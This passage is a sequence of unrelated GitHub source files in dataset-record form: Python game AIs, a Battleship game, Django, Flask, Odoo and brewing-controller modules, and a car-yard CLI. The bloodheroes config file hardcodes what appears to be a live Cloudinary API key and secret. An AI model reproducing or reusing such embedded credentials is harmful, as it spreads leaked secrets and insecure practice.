etat)#stratégie spécifique à un joueur.\n self.historique_temps.append(time() - t)#mesure du temps de réponse\n return mvt\n \n @abc.abstractclassmethod\n def strategie(self, jeu, etat):\n pass\n\n def afficher_historique(self):\n x = range(len(self.historique_temps))\n y = self.historique_temps\n plt.plot(x, y, 'r')\n plt.axline((0,0), (10**-7,0), color=\"black\", linewidth=1)\n plt.axline((0,0), (0,10**-7), color=\"black\", linewidth=1)\n plt.xlabel('numero du choix')\n plt.ylabel('temps de reflexion (en s)')\n plt.title(f'Temps de réponse de {self.nom}')\n plt.show()\n\n def __str__(self):\n return self.nom\n# end #\n\n# JoueurMiniMax #\nclass JoueurMiniMax(Joueur):\n \"\"\"Definit un joueur qui applique une stratégie utilisant le minimax.\n Voir minimax pour plus de précision sur les paramètres.\"\"\"\n def appliquer_minimax(self, jeu, etat, profondeur, fonction_valeur,\\\n traitement_alea, 
condition_tri):\n dresseur = etat[self.id]\n etat.interface.animation_reflexion(dresseur)\n if self.id == 'joueur1':\n mouvement = minimax_joueur1(jeu, etat, profondeur, fonction_valeur,\\\n traitement_alea, condition_tri)[0]\n else:\n mouvement = minimax_joueur2(jeu, etat, profondeur, fonction_valeur,\\\n traitement_alea, condition_tri)[0]\n etat.interface.fin_animation_reflexion()\n return mouvement\n\n# end #\n\nclass Humain(Joueur):\n\n def __init__(self, joueur):\n super().__init__(joueur, 'Humain')\n \n def strategie(self, jeu, etat):\n \"\"\"Réalise l'ensemble des requêtes necessaires pour faire choisir son action à \n l'utilisateur.\"\"\"\n dresseur = etat[self.id]\n if dresseur.doit_changer:\n poke = etat.interface.demander_pokemon(dresseur)\n if poke == 'menu':\n return self(jeu, etat)\n return ChangerPoke(poke)\n choix = etat.interface.demander_choix(dresseur)\n if choix == 'attaquer':\n attaque = etat.interface.demander_attaque(dresseur)\n if attaque == 'menu':\n return self(jeu, etat)\n return attaque\n elif choix == 'changer':\n if dresseur.pokemons_dispo == []:\n print(\"Vous ne pouvez pas changer, il ne vous reste qu'un pokemon\")\n return self(jeu, etat)\n poke = etat.interface.demander_pokemon(dresseur)\n if poke == 'menu':\n return self(jeu, etat)\n action = ChangerPoke(poke)\n return action\n else :\n raise ValueError\n\nclass JoueurAleatoire(Joueur):\n \n def __init__(self, joueur):\n super().__init__(joueur, 'Aléatoire')\n \n def strategie(self, jeu, etat):\n dresseur = etat[self.id]\n #choix aléatoire parmit les action possible du joueur.\n return choice(jeu.mouvements_autorises_dresseur(etat, dresseur))\n\n# avantage_type #\ndef avantage_type(avantage : Pokemon, desavantage : Pokemon):\n \"\"\" Vrai si le pokemon avantage à un avantage de type sur \n le pokemon desavantage \n Remarque : deux pokemon peuvent se resister l'un à\n l'autre à l'autre en même temps et il n'y a alors pas\n d'avantage.\"\"\"\n return (desavantage.type.nom in avantage.type.resistance and not\\\n avantage.type.nom in desavantage.type.resistance) or \\\n (desavantage.type.nom in avantage.type.imunite) or \\\n avantage.type.nom in desavantage.type.faiblesse\n# end #\n\n# basique #\n\nclass JoueurBasique(Joueur):\n \"\"\"Joueur qui suit un ensemble de règles prédéfinies.\"\"\"\n def __init__(self, joueur):\n super().__init__(joueur, 'Basique')\n\n def changer(self, dresseur, adversaire, attaque_possible = True):\n \"\"\" Selection de l'agent si l'agent decide de changer de\n pokemon en priorite\n Precondition : dresseur peut changer de pokemon c'est à dire\n dresseur.pokemons_dispo != []\"\"\"\n # choix en priorite d'un pokemon qui a un avantage de type\n liste_changement = [poke for poke in dresseur.pokemons_dispo \\\n if avantage_type(poke, adversaire.courant)]\n if liste_changement != []:\n return ChangerPoke(choice(liste_changement))\n else:\n # Sinon un pokemon qui n'a pas de desavantage de type\n liste_changement = [poke for poke in dresseur.pokemons_dispo \\\n if not avantage_type(adversaire.courant, poke)]\n if liste_changement != []:\n return ChangerPoke(choice(liste_changement))\n else:\n #A default de changement convenable, on attaque.\n if self.attaque_possible:\n return self.attaquer(dresseur, adversaire)\n \"\"\"si on a plus de PP ou si on doit changer malgrés\n qu'on ne peut faire que des changements desavantageux\n on fait un changement au hazard\"\"\"\n return ChangerPoke(choice(dresseur.pokemons_dispo))\n\n def attaquer(self, dresseur, adversaire):\n \"\"\" Selection de l'agent 
si l'agent decide d'attaquer\n en priorite\"\"\"\n attaques = [attaque for attaque in dresseur.courant.tuple_attaque \\\n if dresseur.courant.liste_pp[attaque.index] > 0]\n if attaques != []:\n #On effectue en priorite l'attaque qui fait le plus de degat parmit\n #celles qui ont des PP.\n attaques.sort(key = lambda attaque : attaque.degat, reverse = True)\n return attaques[0]\n else:\n #si il n'y a plus de PP dans toutes les attaques, l'ordre importe peu.\n return dresseur.courant.attaque_1\n\n def strategie(self, jeu, etat):\n #recuperation des rôles des joueurs.\n dresseur = etat[self.id]\n if self.id == 'joueur1':\n adversaire = etat['joueur2']\n else:\n adversaire = etat['joueur1']\n if etat.phase == 'debut partie':\n #choix de pokemon aleatoire en début de partie\n return choice(list(jeu.mouvements_autorises_dresseur(etat, dresseur)))\n #Verification du nombre de PP dans les attaques\n self.attaque_possible = not dresseur.courant.verifier_pp()\n if dresseur.doit_changer:\n self.attaque_possible = False\n return self.changer(dresseur, adversaire)\n if (not self.attaque_possible) and dresseur.pokemons_dispo != []:\n #si il n'y a plus de PP on change de pokemon si possible\n return self.changer(dresseur, adversaire)\n if \"emprisonne\" not in dresseur.statut and dresseur.pokemons_dispo != [] \\\n and avantage_type(adversaire.courant, dresseur.courant):\n #si il y a un desavantage de type, on change de pokemon\n return self.changer(dresseur, adversaire)\n return self.attaquer(dresseur, adversaire)\n\n# end #\n\n# JoueurAlphaBeta1 #\n\nclass JoueurAlphaBeta1(JoueurMiniMax):\n \"\"\"Joueur qui applique l'algorithme du minimax avec elagage alpha beta.\"\"\"\n def __init__(self, joueur):\n super().__init__(joueur, 'Minimax')\n \n def strategie(self, jeu, etat):\n mvt = super().appliquer_minimax(jeu, etat, 2, jeu.valeur, choix_aleatoire, lambda p : False)\n return mvt\n\n# end #\n\n# JoueurAlphaBeta2 #\n\nclass JoueurAlphaBeta2(JoueurMiniMax):\n \"\"\"Joueur qui applique l'algorithme du minimax avec elagage alpha beta.\"\"\"\n def __init__(self, joueur):\n super().__init__(joueur, 'Expectiminimax')\n \n def strategie(self, jeu, etat):\n mvt = super().appliquer_minimax(jeu, etat, 2, jeu.valeur, esperance, lambda p : False)\n return mvt\n\n# end #\n\n","repo_name":"MaelMontillet/Projects","sub_path":"Pokemon AI/code/joueurs.py","file_name":"joueurs.py","file_ext":"py","file_size_in_byte":7635,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34649428524","text":"from django.urls import path\n\nfrom . 
import views\n\napp_name = 'polls'\n\n# urlpatterns = [\n# path('', views.index, name='index'),\n# path('<int:question_id>/', views.detail, name='detail'),\n# path('<int:question_id>/results/', views.results, name='results'),\n# path('<int:question_id>/vote/', views.vote, name='vote'),\n#\n# ]\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('<int:pk>/', views.DetailView.as_view(), name='detail'),\n path('<int:pk>/results/', views.ResultsView.as_view(), name='results'),\n path('<int:question_id>/vote/', views.vote, name='vote'),\n]\n\n\n\n# http://127.0.0.1:8000/polls/34/\n# URL pattern capturing\n\n# router: '' does not match GET and POST parameters or the domain name, e.g. http://www.liujiangblog.com/polls/?page=3\n# view: views.index receives an HttpRequest object","repo_name":"HWH88340/Django-Learning","sub_path":"mysite2/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20692465737","text":"class BaseConfig(object):\n ADMINS = []\n DEBUG = True\n TESTING = False\n VERBOSE = False\n PROPAGATE_EXCEPTIONS = True\n\n SENTRY_DSN = \"\"\n SENTRY_RELEASE = \"v0.1-rc1\"\n APP_SECRET = \"bloodheroes\"\n EXPIRED_DAYS = 360\n\n ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif', 'JPG', 'PNG', 'JPEG'])\n CLOUDINARY_URL = \"cloudinary://488657822359976:AGCI0cD84C2MU325r61V_VWhbHE@bloodheroes-dev\"\n CLOUD_API_KEY = \"\"\n CLOUD_API_SECRET = \"\"\n CLOUD_API_NAME = \"\"\n\n\nclass DevelopmentConfig(BaseConfig):\n CLOUD_API_KEY = 488657822359976\n CLOUD_API_SECRET = \"AGCI0cD84C2MU325r61V_VWhbHE\"\n CLOUD_API_NAME = \"bloodheroes-dev\"\n\n\nclass TestingConfig(BaseConfig):\n APP_MODE = \"unit_test\"\n TESTING = True\n DEBUG = True\n MONGO_DBNAME = 'bloodheroes_test'\n\n\nclass StagingConfig(BaseConfig):\n CLOUD_API_KEY = 488657822359976\n CLOUD_API_SECRET = \"AGCI0cD84C2MU325r61V_VWhbHE\"\n CLOUD_API_NAME = \"bloodheroes-dev\"\n\n\nclass ProductionConfig(BaseConfig):\n pass\n\n\nconfig = {\n \"development\": \"bloodheroes.config.DevelopmentConfig\",\n \"testing\": \"bloodheroes.config.TestingConfig\",\n \"staging\": \"bloodheroes.config.StagingConfig\",\n \"production\": \"bloodheroes.config.ProductionConfig\"\n}\n","repo_name":"maulanasly/bloodheroes","sub_path":"bloodheroes/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34057889625","text":"import os\nimport warnings\n\nfrom dwave.cloud.config import load_config\nfrom dwave.cloud.exceptions import CanceledFutureError, ConfigFileError\n\n\n# try to load client config needed for live tests on SAPI web service\ntry:\n # by default, use `test` profile from `tests/dwave.conf`,\n # with secrets (token) read from env\n default_config_path = os.path.join(os.path.dirname(__file__), 'dwave.conf')\n default_config_profile = 'test'\n\n # allow manual override of config file and profile used for tests\n test_config_path = os.getenv('DWAVE_CONFIG_FILE', default_config_path)\n test_config_profile = os.getenv('DWAVE_PROFILE', default_config_profile)\n\n config = load_config(config_file=test_config_path,\n profile=test_config_profile)\n\n # ensure config is complete\n for var in 'endpoint token solver'.split():\n if not config[var]:\n raise ValueError(\"Config incomplete, missing: {!r}\".format(var))\n\nexcept (ConfigFileError, ValueError) as e:\n config = None\n warnings.warn(\"Skipping live tests due to: 
{!s}\".format(e))\n","repo_name":"Elmistrana/dwave-cloud-client","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"9849105414","text":"#!/usr/bin/env python3\n# Justin Clark, Kaden Roof\n# 2021/11/11\n\n# battleship.py\n\nimport random\n\n''' The BattleShip Game! '''\n\nDEBUG = False\n\nEMPTY = \" \"\n\nhuman_ship_count = 0\ncomputer_ship_count = 0\n\nTRC = '\\u2510' # Top right corner\nTLC = '\\u250c' # Top left corner\nBRC = '\\u2518' # Bottom right corner\nBLC = '\\u2514' # Bottom left corner\nTHRZ = '\\u252c' # Top horizontal bar\nBHRZ = '\\u2534' # Bottom horizontal bar\nHRZ = '\\u2500' # Horizontal bar\nVRT = '\\u2502' # Vertical bar\nLVRT = '\\u251c' #Left vertical bar\nRVRT = '\\u2524' # Right Vertical bar\nMVRT = '\\u253c' # Middle vertical bar\n\nTROW = f\" {TLC}{(HRZ+THRZ)*9}{HRZ}{TRC}\"\nMROW = f\" {LVRT}{(HRZ+MVRT)*9}{HRZ}{RVRT}\"\nBROW = f\" {BLC}{(HRZ+BHRZ)*9}{HRZ}{BRC}\"\n\nHIT = \"H\"\nMISS = \"M\"\n\nships = { \"destroyer\" : \"D\", \"cruiser\" : \"C\", \"sub\" : \"S\", \"battleship\" : \"B\", \"carrier\" : \"A\" }\n\nplayer_positions = {}\ncomputer_positions = {}\n\ndef setup_blank_board():\n ''' Make new Board dictionary from a-t and 0-9'''\n board = {}\n for letter in \"abcdefghijklmnopqrst\":\n for column in \"0123456789\":\n board[letter+column] = EMPTY\n\n return board\n\ndef display_instructions():\n ''' Displays the instructions to the screen '''\n print(\"\"\"\n === Off Brand Battleship ===\n Instructions!:\n\n 1. place your pieces on the board\n 2. tell the computer whether or not you feel the need to go first or not...\n 3. depending on who goes first, a player will attack on the opposite player's board and a \"X\" for hit will appear or an \"M\" for miss will appear on both boards\n 4. once every one of a player's ships have been destroyed, the game will end and the player with ships still standing will be the victor\n\n \"\"\")\n\n input(\"Press any button to start...\\n\")\n\ndef display_board(b):\n '''display the fleet and attack boards'''\n print(\" FLEET \\t\\t ATTACK\")\n print()\n print(\" 0 1 2 3 4 5 6 7 8 9 \\t\\t 0 1 2 3 4 5 6 7 8 9 \")\n print(f\"{TROW}\\t\\t{TROW}\")\n for r in ['ak','bl','cm','dn','eo','fp','gq','hr','is','jt']:\n # Display the fleet and attack rows side by side\n r0, r1 =r[0], r[1]\n print(f\" {r0}{VRT}\", end='')\n # Fleet Row\n for c in \"0123456789\":\n print(f\"{b[r0+c]}{VRT}\", end='')\n\n # Attack Row\n print(f\"\\t\\t{r1} {VRT}\", end='')\n for c in \"0123456789\":\n print(f\"{b[r1+c]}{VRT}\", end='')\n\n print()\n if r != 'jt':\n print(f\"{MROW}\\t\\t{MROW}\")\n\n else: # print bottom of grid\n print(f\"{BROW}\\t\\t{BROW}\")\n\ndef human_board_setup(board):\n ''' make a new board with player inputs and return it '''\n player_board = dict(board)\n\n print(\" === Planning Phase! 
===\\n\")\n\n for ship in ships:\n print(\"Multiple inputs are accepted and are neccesary for every ship!\")\n positions = input(f\"Enter your positions for the {ships[ship]} (letter, number): \")\n \n positions = positions.replace(\" \", \"\")\n positions = positions.split(\",\")\n\n if DEBUG:\n print(positions)\n\n for position in positions:\n print(position)\n player_board[position] = ships[ship]\n\n\n global human_ship_count\n human_ship_count += 1\n\n return player_board\n\ndef computer_board_setup(board):\n ''' Setup arbitrary positions for the computer '''\n #computer_board = dict(board)\n\n global computer_ship_count\n\n if not DEBUG:\n # Carrier\n for i in range(5):\n computer_board[\"a\"+str(i)] = \"A\"\n computer_ship_count += 1\n \n # Battleship\n for i in range(4):\n computer_board[\"b\"+str(i)] = \"B\"\n computer_ship_count += 1\n\n # Submarine\n for i in range(3):\n computer_board[\"c\"+str(i)] = \"S\"\n computer_ship_count += 1\n\n # Cruiser\n for i in range(3):\n computer_board[\"d\"+str(i)] = \"C\"\n computer_ship_count += 1\n\n # Destroyer\n for i in range(3):\n computer_board[\"e\"+str(i)] = \"D\"\n computer_ship_count += 1\n else:\n computer_board[\"a0\"] = \"A\"\n computer_ship_count += 1\n \n computer_board[\"a1\"] = \"A\"\n computer_ship_count += 1\n\n return computer_board\n\ndef yes_or_no():\n ''' Ask the user for yes or no and return it '''\n first = False\n\n answer = input(\"Would you like to go first? (y/n): \")\n\n if answer.lower() == \"y\":\n first = True\n elif answer.lower() == \"n\":\n first = False\n\n return first\n\ndef attack(person):\n ''' attacks the opposing board '''\n\n global human_ship_count\n global computer_ship_count\n\n if person != \"computer\":\n coordinates = input(\"Where do you want to attack?: \")\n else:\n comp_cords = \"klmnopqrst\"\n coordinates = comp_cords[random.randint(0, len(comp_cords) - 1)] + str(random.randint(0, 9))\n\n actual_coordinates = actual_coords(coordinates)\n\n if person == \"human\":\n if computer_board[actual_coordinates] != EMPTY:\n print(f\"Hit! at position {coordinates}\\n\")\n human_board[coordinates] = \"X\"\n computer_board[actual_coordinates] = \"X\"\n computer_ship_count -= 1\n\n elif computer_board[actual_coordinates] == EMPTY:\n print(f\"Miss! at position {coordinates}\\n\")\n human_board[coordinates] = \"M\"\n\n elif person == \"computer\":\n if human_board[actual_coordinates] != EMPTY:\n print(f\"Hit! at position {coordinates}\\n\")\n computer_board[coordinates] = \"X\"\n human_board[actual_coordinates] = \"X\"\n human_ship_count -= 1\n \n elif human_board[actual_coordinates] == EMPTY:\n print(f\"Miss! 
at position {coordinates}\\n\")\n computer_board[coordinates] = \"M\"\n\ndef actual_coords(coords):\n ''' Convert the coordinates to the enemy coordinates or vice versa '''\n alpha = \"abcdefghijklmnopqrst\"\n letter = coords[0]\n actual_index = alpha.find(letter)-10\n actual_coordinates = alpha[actual_index] + coords[1]\n\n return actual_coordinates\n\ndisplay_instructions()\n\n# Setup\nhuman_board = setup_blank_board()\nhuman_board = human_board_setup( human_board )\n\ncomputer_board = setup_blank_board()\ncomputer_board = computer_board_setup( computer_board )\n\n#print(\"Human Board\")\n#display_board( human_board )\n\nif DEBUG:\n print(\"Computer Board\")\n display_board( computer_board )\n\nfirst = \"human\"\n\nif yes_or_no():\n print(\"Human is going first\")\n print(\"Hahahaha, it looks like you need it!\")\n\n first = \"human\"\nelse:\n print(\"Computer is going first\")\n print(\"Don't get too cocky -_-, it will be your undoing\\n\")\n\n first = \"computer\"\n\ndone = False\n\n# Gameplay\nwhile not done:\n\n done = False\n\n if human_ship_count == 0:\n print(\"< You Lose >\")\n\n print(\"Here was the computer's board!\")\n display_board(computer_board)\n\n done = True\n break\n\n if computer_ship_count == 0:\n print(\" < You Win >\")\n \n print(\"Here was the computer's board!\")\n display_board(human_board)\n\n done = True\n break\n\n if first == \"human\":\n\n if DEBUG:\n print(\"==== Human Board ====\")\n \n display_board(human_board)\n\n if DEBUG:\n print(computer_board)\n\n print(\"\\n === Human is going... === \\n\")\n attack(first)\n first = \"computer\"\n elif first == \"computer\":\n\n if DEBUG:\n print(\"==== Computer Board ====\")\n display_board(computer_board)\n print(\"=== Computer is going... ===\")\n attack(first)\n first = \"human\"\n\nprint(\"Game is Done!\")\n","repo_name":"JustinClark2k3/battleship","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":7874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31863419814","text":"import random\r\n# You will need to install matplotlib with pip to view coronation histograms!\r\nimport matplotlib.pyplot as plt\r\nimport magicLampBot as bot\r\n\r\n## This is a highly simplified version of Heart of Crown, where a card can only\r\n## generate gold, be worth points, or neither. 
The convention used here is positive\r\n## numbers represent that much gold, while negative numbers represent point cards.\r\n\r\n## We will run 1000 solitaire games, store the number of turns to coronation for\r\n## each, and then create a histogram.\r\nturnCounts = []\r\n\r\nfor iteration in range(1000):\r\n ## The standard starting deck has seven Farming Villages and three Apprentice\r\n ## Maids (represented as 0 since they are worth no gold and we have do not\r\n ## intend to use their -2 VP value.)\r\n deck = [\"Farming Village\", \"Farming Village\", \"Farming Village\",\r\n \"Farming Village\", \"Farming Village\", \"Farming Village\",\r\n \"Farming Village\", \"Apprentice Maid\", \"Apprentice Maid\",\r\n \"Apprentice Maid\"]\r\n random.shuffle(deck)\r\n hand = []\r\n discard = []\r\n domain = []\r\n points = 0\r\n turns = 0\r\n deckPoints = 0\r\n log = \"\"\r\n while points < 20:\r\n turns += 1\r\n log += \"Turn {}:\\n\".format(turns)\r\n for draw in range(5):\r\n if len(deck) == 0:\r\n deck = discard\r\n discard = []\r\n random.shuffle(deck)\r\n hand.append(deck.pop())\r\n hand.sort()\r\n log += \"Draw: {}\\n\".format(hand)\r\n field = {\r\n \"hand\": hand,\r\n \"deck\": deck,\r\n \"discard\": discard,\r\n \"domain\": domain,\r\n \"points\": points,\r\n \"deckPoints\": deckPoints\r\n }\r\n result = bot.botTurn(field)\r\n hand = result[0][\"hand\"]\r\n deck = result[0][\"deck\"]\r\n discard = result[0][\"discard\"]\r\n domain = result[0][\"domain\"]\r\n points = result[0][\"points\"]\r\n deckPoints = result[0][\"deckPoints\"]\r\n log += result[1]\r\n while len(hand) > 0:\r\n discard.append(hand.pop())\r\n if iteration == 15:\r\n print(log)\r\n turnCounts.append(turns)\r\n\r\nplt.gca().set_ylim([0, 300])\r\nplt.hist(turnCounts, [14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28])\r\nplt.show()\r\n","repo_name":"GrayEmbrace/HeartOfCrownSim","sub_path":"hoc_sim.py","file_name":"hoc_sim.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71656541605","text":"from util import *\nfrom model import *\nfrom brewapp import app, socketio, manager\nimport yaml\n\nimport json\n\ndef pre_post(data, **kw):\n\n if data[\"type\"] is \"json\":\n data[\"value\"] = json.dumps(data[\"value\"])\n\n\ndef post_post(result, **kw):\n if result[\"type\"] is \"json\":\n result[\"value\"] = json.loads(result[\"value\"])\n readConfig()\n socketio.emit('config', app.brewapp_config, namespace='/brew')\n\n\ndef post_get_many(result, **kw):\n for o in result[\"objects\"]:\n if o[\"type\"] is \"json\":\n o[\"value\"] = json.loads(o[\"value\"])\n\n result[\"objects\"] = sorted(result[\"objects\"], key=lambda k: k['name'])\n\n\ndef readConfig():\n app.brewapp_config = {}\n config = Config.query.all()\n for c in config:\n app.brewapp_config[c.name] = c.value\n\n@brewinit(-1001)\ndef initConfig():\n if (app.createdb is False):\n return\n with open(\"config/config.yaml\", 'r') as stream:\n try:\n y = yaml.load(stream)\n for k in y.keys():\n opts = y[k].get(\"options\", None)\n if opts is not None:\n opts = \",\".join(opts)\n\n db.session.add(Config(name=k, value=y[k].get(\"value\", None), type=y[k].get(\"type\", None), description=y[k].get(\"description\", None), options=opts))\n db.session.commit()\n except yaml.YAMLError as exc:\n app.logger.error(\"Load config ERROR \" + str(exc))\n\n\n@brewinit(order=-1000)\ndef init():\n manager.create_api(Config, methods=['GET', 'POST', 'DELETE', 'PUT'], 
results_per_page=None,\n preprocessors={\n 'POST':[pre_post],\n 'PATCH_SINGLE': [pre_post]},\n postprocessors={\n 'POST':[post_post],\n 'GET_MANY': [post_get_many],\n 'GET_SINGLE':[post_post],\n 'PATCH_SINGLE': [post_post]})\n readConfig()\n\nfrom brewapp.base.devices import *\nfrom brewapp.base.thermometer import *\n\n@app.route('/api/config/setup', methods=['GET'])\ndef config_setup():\n return json.dumps({\"setup\": app.brewapp_config.get(\"SETUP\", \"NO\")})\n\n@brewinit()\ndef initDriver():\n app.logger.info(\"INIT Driver\")\n\n hardware= {\n 'DUMMY': dummygpio.DummyGPIO(),\n 'GPIO': gpio.BrewGPIO(),\n 'GEMBIRD': gembird.GembirdUSB(),\n 'PIFACE': piface.PiFace(),\n 'WIFISOCKET': wifisocket.WifiSocket(),\n 'CHIP-GPIO': chip_gpio.BrewGPIO(),\n 'GPIOSYS': gpiosys.GPIOSys()\n }\n\n thermometer = {\n 'DUMMY': dummy_thermometer.DummyThermometer(),\n '1WIRE': w1_thermometer.OneWireThermometer(),\n '1WIRE_V2': w1_thermometer2.OneWireThermometer2(),\n 'USB': usb_thermometer.USBThermometer()\n }\n\n app.brewapp_hardware = hardware.get(app.brewapp_config.get(\"SWITCH_TYPE\", \"DUMMY\"), dummygpio.DummyGPIO())\n app.brewapp_thermometer = thermometer.get(app.brewapp_config.get(\"THERMOMETER_TYPE\", \"DUMMY\"), dummy_thermometer.DummyThermometer())\n app.logger.info(app.brewapp_hardware )\n app.logger.info(app.brewapp_thermometer )\n","repo_name":"craftbeerpi/craftbeerpi","sub_path":"brewapp/base/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":591,"dataset":"github-code","pt":"52"} +{"seq_id":"42111025928","text":"'''\nGiven an array of strings strs, group the anagrams together. You can return the answer in any order.\nAn Anagram is a word or phrase formed by rearranging the letters of a different word or phrase, typically using all the original letters exactly once.\n\nInput: strs = [\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"]\nOutput: [[\"bat\"],[\"nat\",\"tan\"],[\"ate\",\"eat\",\"tea\"]]\n'''\n\n'''\n# Loop over each word.\n# On each iteration, sort the word and add the original word to the hashmap under its sorted key.\n# At the end of the loop, return the values of the hashmap, which form the answer.\n\nTime Complexity: O(n * k log k), where k is the length of the longest word\nSpace Complexity: O(n * k)\n'''\n\nclass Solution:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n \n dic = {}\n for word in strs:\n \n sortedword = ''.join(sorted(word))\n \n if sortedword in dic:\n dic[sortedword].append(word)\n \n else:\n dic[sortedword] = [word]\n \n return dic.values()\n \n","repo_name":"ankitakotadiya/CoadingChallenge","sub_path":"HashMap/GroupAnagrams.py","file_name":"GroupAnagrams.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74274608165","text":"#!/home/user/.local/share/virtualenvs/CARYARDMANAGEMENTSYSTEM-cjpx4pQo/bin/python\n\nimport click\nfrom models import session, Vehicle\n\n@click.group()\ndef cli():\n pass\n\n# Existing Click commands\n\n@click.command()\n@click.option('--make', prompt='Vehicle Make', required=True, help='Make of the vehicle')\n@click.option('--model', prompt='Vehicle Model', required=True, help='Model of the vehicle')\n@click.option('--year', prompt='Vehicle Year', required=True, type=int, help='Year of the vehicle')\n@click.option('--price', prompt='Vehicle Price', required=True, type=float, help='Price of the vehicle')\ndef add_vehicle(make, model, year, price):\n \"\"\"Add a new vehicle to the 
database.\"\"\"\n vehicle = Vehicle(make=make, model=model, year=year, price=price)\n session.add(vehicle)\n session.commit()\n click.echo('Vehicle information saved successfully!')\n\ncli.add_command(add_vehicle)\n\n# Existing Click commands\n\n@click.command()\ndef list_vehicles():\n \"\"\"List all your vehicles from the database.\"\"\"\n \n try:\n # Query the database to get all vehicles\n vehicles = session.query(Vehicle).all()\n\n if not vehicles:\n click.echo(\"You don't have any vehicles in the database.\")\n else:\n # Display the list of vehicles\n click.echo(\"List of your vehicles:\")\n for vehicle in vehicles:\n click.echo(f\"ID: {vehicle.id}, Make: {vehicle.make}, Model: {vehicle.model}, Year: {vehicle.year}, Price: {vehicle.price}\")\n\n except Exception as e:\n click.echo(f\"An error occurred: {str(e)}\")\n \ncli.add_command(list_vehicles)\n\n@click.command()\n@click.option('--id', prompt='Vehicle ID', required=True, type=int, help='ID of the vehicle to update')\n@click.option('--newprice', prompt='New Price', required=True, type=float, help='New price for the vehicle')\n\ndef update_price(id , newprice):\n \"\"\"Update vehicles from the database.\"\"\"\n\n try:\n \n vehicle = session.query(Vehicle).filter_by(id=id).first()\n if not vehicle:\n click.echo(f\"Vehicle with ID {id} not found in the database.\")\n\n else:\n #now update the vehicleprice\n vehicle.price = newprice\n session.commit()\n click.echo(f\"Price of Vehicle ID {id} updated to {newprice} successfully.\")\n\n except Exception as e:\n click.echo(f\"An error occurred: {str(e)}\")\n\ncli.add_command(update_price)\n\n@click.command()\n@click.option('--id', prompt='Vehicle ID', required=True, type=int, help='ID of the vehicle to delete')\n\ndef delete_vehicle(id):\n \"\"\"Delete a vehicle from the database.\"\"\"\n\n try:\n # Query the database to find the vehicle by ID\n vehicle = session.query(Vehicle).filter_by(id=id).first()\n\n if not vehicle:\n click.echo(f\"Vehicle with ID {id} not found in the database.\")\n else:\n # Delete the vehicle from the database\n session.delete(vehicle)\n session.commit()\n click.echo(f\"Vehicle with ID {id} deleted successfully.\")\n\n except Exception as e:\n click.echo(f\"An error occurred: {str(e)}\")\n\ncli.add_command(delete_vehicle)\n\nif __name__ == '__main__':\n cli()\n","repo_name":"kentechcomps/CARYARDMANAGEMENTSYSTEM","sub_path":"App/caryard.py","file_name":"caryard.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12367779314","text":"from odoo import api, fields, models\nfrom odoo.models import expression\nfrom odoo.tools.safe_eval import safe_eval\n\n\nclass WizCreateAssistanceIssue(models.TransientModel):\n _name = \"wiz.create.assistance.issue\"\n _description = \"Wizard for assistance issue creation\"\n\n @api.model\n def _get_selection_dayofweek(self):\n return self.env[\"resource.calendar.attendance\"].fields_get(\n allfields=[\"dayofweek\"])[\"dayofweek\"][\"selection\"]\n\n partner_ids = fields.Many2many(\n comodel_name=\"res.partner\",\n string=\"Students\",\n )\n date = fields.Date(\n required=True,\n default=fields.Date.context_today,\n )\n dayofweek = fields.Selection(\n selection=\"_get_selection_dayofweek\",\n string=\"Day of Week\",\n compute=\"_compute_dayofweek\",\n )\n\n @api.model\n def default_get(self, fields):\n result = super(WizCreateAssistanceIssue, self).default_get(fields)\n if self.env.context.get(\"active_ids\"):\n result.update({\n 
\"partner_ids\": [\n (6, 0, self.env.context.get(\"active_ids\"))],\n })\n return result\n\n @api.depends(\"date\")\n def _compute_dayofweek(self):\n for record in self:\n record.dayofweek = str(record.date.weekday())\n\n @api.multi\n def create_assistance_issues(self):\n assistance_type = self.env.ref(\"issue_education.assistance_issue_type_master\")\n assistance_school_types = self.env[\"school.college.issue.type\"].search([\n (\"issue_type_id\", \"=\", assistance_type.id),\n ])\n issue_obj = issues = self.env[\"school.issue\"]\n academic_year = self.env[\"education.academic_year\"].search([\n (\"date_start\", \"<=\", self.date),\n (\"date_end\", \">=\", self.date),\n ])\n for partner in self.partner_ids:\n for group in partner.student_group_ids.filtered(\n lambda g: g.academic_year_id == academic_year):\n assistance_school_type = assistance_school_types.filtered(\n lambda t: t.school_id == group.center_id and\n t.education_level_id == group.level_id)\n for schedule in group.schedule_ids.filtered(\n lambda s: not s.timetable_ids or\n self.dayofweek in s.mapped(\"timetable_ids.dayofweek\")):\n group = schedule.group_ids.filtered(\n lambda g: partner in g.student_ids)[:1]\n issue = issue_obj._find_issue(\n partner.id, self.date, assistance_school_type[:1].id,\n group.id, schedule.id)\n if not issue:\n issue_vals = issue_obj.prepare_issue_vals(\n self.date, assistance_school_type[:1], partner,\n schedule, group)\n issue = issue_obj.create(issue_vals)\n issues |= issue\n action = self.env.ref(\"issue_education.action_school_issue\")\n action_dict = 